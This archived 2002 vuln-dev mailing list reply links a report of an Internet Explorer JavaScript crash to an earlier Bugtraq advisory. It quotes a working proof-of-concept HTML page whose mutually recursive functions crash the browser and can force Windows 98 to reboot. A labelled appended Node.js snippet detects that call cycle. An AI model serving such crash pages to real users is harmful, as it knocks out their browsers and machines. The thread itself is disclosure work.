This seems quite familiar to the "Multiple Vendor JavaScript Interpreter
Denial Of Service Vulnerability" reported to Bugtraq in March.

http://online.securityfocus.com/bid/4322

Patrik Birgersson

> -----Original Message-----
> From: Matias Sedalo [mailto:s0t4ipv6at_private]
> Sent: 2. juni 2002 23:08
> To: vuln-devat_private
> Subject: Buffer Overflow with all versions of Internet Explorer and
> Javacript.
>
>
> the 28/07/1999 I have discovered a stack buffer overflow caused by until
> the moment all the versions of the Internet Explorer.
> In many windows98 causes the necessity to reinitiate the equipment, since
> to my to seem it remains without memory.
> Only it has been proven in several versions 5 of IE on WindowsNT
> server sp6 and windows98 Second Edition. As I said before the Windows 98
> I had to reinitiate it to the force.
> Can be possible to execute arbitrary code using the variable company of
> the example?
>
> // internet Explorer 5.00.2314.1003 on WindowsNT 4 sp6
> // internet Explorer 5.00.3500.1003 on Windows98se
>
> -----------cut here---------------------------
> <html><head></head>
> <script language="JAVASCRIPT">
> function hacerMail() {
>     var company;
>
>     crear();
>     address="s0t4ipv6at_private";
>     soporte();
> }
> function soporte(){
>     var soporte="billat_private";
>     window.location="mailto:"+address+"?cc="+soporte+"&subject="+company;
>     // window.location=company; // also this line cause the bof.
>     close(hacerMail());
> }
> function crear(){
>     company="shellcode here?\n"; // i don't think so.
> }
> </script>
> <input type="button" onClick="hacerMail();" value="SMASH!"></input>
> </html>
> -----------cut here---------------------------
>
> Regards.
>
> - Internet es perjudicial para la salud -
> - Ley N~ 127.0.0.1
>
> Matias Sedalo
> http://www.shellcode.com.ar
>
> s0t4ipv6at_private
> B7A1 B45E 4906 34BD 70A1 55F8 E5A0 BCA2
> ........................................
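An added example, not part of either message above: in the quoted script, hacerMail() calls soporte(), which calls hacerMail() again as the argument to close(), with no terminating condition. The Node.js check below builds a call graph from function declarations and reports such a cycle; the sample string is a constructed reduction of the quoted script, `callGraph` and `findCycle` are hypothetical helper names, and the regex parsing is approximate (braces inside strings are not handled).

```javascript
// Constructed sample: the quoted script reduced to its declarations and calls.
const sample = `
function hacerMail() { var company; crear(); address = "a"; soporte(); }
function soporte() { var soporte = "b"; window.location = "mailto:" + address; close(hacerMail()); }
function crear() { company = "text"; }
`;

// Map each declared function to the set of declared functions its body calls.
function callGraph(src) {
  const decl = /function\s+([A-Za-z_$][\w$]*)\s*\([^)]*\)\s*\{/g;
  const bodies = new Map();
  let m;
  while ((m = decl.exec(src)) !== null) {
    // Walk braces from the opening "{" to find the end of the body.
    let depth = 1, i = decl.lastIndex;
    for (; i < src.length && depth > 0; i++) {
      if (src[i] === "{") depth++;
      else if (src[i] === "}") depth--;
    }
    bodies.set(m[1], src.slice(decl.lastIndex, i - 1));
    decl.lastIndex = i;
  }
  const graph = new Map();
  for (const [name, body] of bodies) {
    const callees = new Set();
    for (const c of body.matchAll(/([A-Za-z_$][\w$]*)\s*\(/g)) {
      if (bodies.has(c[1])) callees.add(c[1]);
    }
    graph.set(name, callees);
  }
  return graph;
}

// Depth-first search; returns the first call cycle as a list of names, or null.
// A cycle is only a candidate: recursion guarded by a base case is legitimate.
function findCycle(graph) {
  const onStack = new Set(), done = new Set(), path = [];
  function visit(n) {
    onStack.add(n); path.push(n);
    for (const next of graph.get(n)) {
      if (onStack.has(next)) return path.slice(path.indexOf(next)).concat(next);
      if (!done.has(next)) { const c = visit(next); if (c) return c; }
    }
    onStack.delete(n); done.add(n); path.pop();
    return null;
  }
  for (const n of graph.keys()) {
    if (!done.has(n)) { const c = visit(n); if (c) return c; }
  }
  return null;
}
```
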
This archive was generated by hypermail 2b30 : Mon Jun 03 2002 - 14:33:56 PDT